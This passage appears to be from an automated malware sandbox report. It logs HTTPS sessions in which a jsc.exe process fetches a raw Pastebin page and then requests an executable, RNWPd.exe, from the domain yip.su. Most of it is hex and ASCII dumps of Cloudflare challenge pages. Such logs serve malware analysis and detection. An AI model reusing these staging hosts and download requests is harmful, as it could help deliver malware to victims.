                                    2024-08-17 22:11:29 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:11:29 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:11:29 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:11:29 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:11:29 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 33 33 38 30 27 2c 63 52 61 79 3a 20 27 38 62 34 64 30 30 30 64 35 63 34 38 34 33 64 37 27 2c 63 48 61 73 68 3a 20 27 65 66 33 33 62 37 65 63 33 66 32 64 61 63 61 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 43 44 38 51 63 6c 39 4b 30 52 6c 6a 52 7a 54 6b 32 64 50 55 66 4c 58 62 48 59 6d 76 56 47 39 4a 54 4d 2e 69 2e 32 59 77 76 79 30 2d 31 37 32 33 39 33 32 36 38 39 2d 30 2e 30 2e 31 2e 31 2d 34 31 35 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '33380',cRay: '8b4d000d5c4843d7',cHash: 'ef33b7ec3f2daca',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=CD8Qcl9K0RljRzTk2dPUfLXbHYmvVG9JTM.i.2Ywvy0-1723932689-0.0.1.1-4158",cFPWv: 'g',cTTim
                                    2024-08-17 22:11:29 UTC1369INData Raw: 38 6f 63 4b 6e 55 6f 35 41 56 56 39 77 6e 2e 66 31 35 64 4b 39 4a 6e 54 2e 4f 6f 62 42 6c 73 72 34 4c 36 42 50 4f 4b 37 7a 32 56 58 44 53 39 72 34 74 78 6a 74 58 78 6d 76 39 30 37 6b 6c 54 49 46 55 36 6c 72 55 7a 6d 62 72 58 6b 67 57 6c 64 6e 78 6c 36 56 6c 6a 7a 48 73 53 46 4d 35 44 55 76 78 72 5f 45 42 32 43 50 76 68 57 32 6e 6b 53 59 4f 4c 35 4a 44 57 5a 59 73 34 39 37 53 75 42 2e 59 6b 4a 74 6e 47 68 52 65 34 4b 36 57 57 4e 35 6d 34 6f 75 54 65 78 4a 35 62 77 79 4a 51 45 67 52 37 41 37 30 62 38 59 37 6a 66 59 46 57 65 44 71 66 69 66 34 72 42 51 65 46 4f 5f 51 57 31 6e 79 42 44 55 44 59 46 53 6a 73 61 7a 74 49 72 4a 75 57 4b 6e 79 49 52 41 2e 76 6a 71 47 49 6a 6f 58 51 77 5f 38 4a 34 53 30 51 6b 45 43 6c 74 58 5a 6a 59 41 46 74 58 5a 52 44 6a 43 64 6e
                                    Data Ascii: 8ocKnUo5AVV9wn.f15dK9JnT.OobBlsr4L6BPOK7z2VXDS9r4txjtXxmv907klTIFU6lrUzmbrXkgWldnxl6VljzHsSFM5DUvxr_EB2CPvhW2nkSYOL5JDWZYs497SuB.YkJtnGhRe4K6WWN5m4ouTexJ5bwyJQEgR7A70b8Y7jfYFWeDqfif4rBQeFO_QW1nyBDUDYFSjsaztIrJuWKnyIRA.vjqGIjoXQw_8J4S0QkECltXZjYAFtXZRDjCdn


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    72192.168.2.549799104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:34 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:34 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:11:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4d002d3a2419c7-EWR
                                    2024-08-17 22:11:34 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:11:34 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:11:34 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:11:34 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:11:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    73192.168.2.549800188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:35 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:35 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:35 UTC685INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 42 77 36 68 48 6e 65 76 33 6f 78 31 63 30 6e 58 42 6c 35 78 59 6d 33 5a 64 6d 2b 42 6e 48 32 59 66 47 59 2b 43 50 51 4f 51 76 7a 77 4c 58 58 69 30 46 45 4f 56 51 44 79 4c 65 48 68 78 69 53 32 54 4b 69 47 76 66 58 45 52 62 5a 51 2f 54 4f 54 45 55 61 65 63 76 48 56 6d 49 61 48 63 66 33 71 30 55 38 77 78 62 45 70 66 41 51 3d 24 72 53 65 2f 62 34 43 67 54 68 33 30 34 32 6c 48 35 35 72 58 43 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: Bw6hHnev3ox1c0nXBl5xYm3Zdm+BnH2YfGY+CPQOQvzwLXXi0FEOVQDyLeHhxiS2TKiGvfXERbZQ/TOTEUaecvHVmIaHcf3q0U8wxbEpfAQ=$rSe/b4CgTh3042lH55rXCA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:11:35 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:35 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:11:35 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:11:35 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:11:35 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:11:35 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
